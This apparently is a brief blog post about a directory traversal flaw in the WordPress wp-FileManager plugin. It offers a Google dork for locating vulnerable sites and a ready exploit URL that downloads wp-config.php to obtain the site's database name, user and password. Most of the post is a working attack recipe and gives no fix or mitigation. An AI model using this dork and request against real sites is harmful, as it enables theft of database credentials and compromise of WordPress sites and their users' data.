ByEge has published a new weakness on wp-FileManager plugin. If you take advantage of this vulnerability, you could download for example the wp-config.php file where you can find out the database name, user name and password for the Wordpress site.

Google Dorks: inurl:wp-content/plugins/wp-filemanager/

Test : http://server/wp-content/plugins/wp-filemanager/incl/libfile.php?&path=../../&filename=wp-config.php&action=download

Only  works if "Allow Download" setting is checked in the FileManager's settings on the server.

Original source here.